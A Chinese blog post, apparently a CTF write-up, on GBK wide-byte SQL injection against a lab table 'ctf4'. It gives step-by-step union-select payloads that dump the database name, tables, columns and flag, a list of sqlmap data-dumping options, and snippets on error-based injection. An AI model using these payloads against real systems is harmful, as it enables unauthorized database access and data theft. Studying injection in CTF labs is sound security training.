SQL注入

2021-09-20 01:25:07 字數 1271 閱讀 3079

1、爆出資料庫

手工

id=%df%27%20union%20select%201,%20database()%23

工具

2、爆出表

手工

id=%df%27 union select 1,group_concat(table_name)from information_schema.tables where table_schema=database()%23

工具

3、爆出表的內容

手工

id=%df%27 union select 1,group_concat(column_name)from information_schema.columns where table_name=ctf4%23

ctf4進行16進製制轉換

id=%df' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x63746634%23

工具

4、獲取列的內容

手工

id=%df%27 union select 1,group_concat(flag) from ctf4%23

工具

關注黃色標註,開啟此檔案可得。

後續參考:

1、sql備忘錄

2、sql injection

關於sqlmap注入:

-h 顯示基礎的幫助訊息並退出

-hh 顯示高階的幫助訊息並退出

-u 目標url

--thread 10 最大為10

--level 3 最大為5

--risk 3 最大為3

-a 檢索所有

--current-db 檢索當前資料庫

--tables 列舉資料庫表名

--columns 列舉資料庫列名

--dump 輸出資料庫表的資料

--search 查詢特定的列名,表名或資料庫名,配合-d,-c,-t

-d 指定資料庫名

-t 指定資料庫表名

-c 指定資料庫列名

--common-tables 檢測常見的表名

--common-columns 檢測常見的列名

SQL注入(三) sql注入 bugku

原理 mysql 在使用 gbk 編碼的時候,會認為兩個字元為乙個漢字,例如 aa 5c 就是乙個 漢字 前乙個 ascii碼大於 128 才能到漢字的範圍 我們在過濾 的時候,往往利用的思 路是將 轉換為 換的函式或者思路會在每一關遇到的時候介紹 因此我們在此想辦法將 前面新增的 除掉,一般有兩種...

SQL注入 報錯注入

乙個帶get引數的 並且不從資料庫返回資料,但存在報錯資訊 檢視字段情況 報錯注入語句格式 and 1 2 union select1,2,3 from select count concat floor rand 0 2 sql語句 a from information schema.tables...

SQL注入 報錯注入

sql注入基礎 盲注 用於注入結果無回顯但錯誤資訊有輸出的情況 floor函式 返回小於等於某值的整數,例如floor 1 則返回1,floor 1.9 也返回1 rand函式 生成隨機數.可指定seed,指定後每次生成的數都一樣即偽隨機,不指定seed則每次生成的隨機數都不一樣.通過floor和r...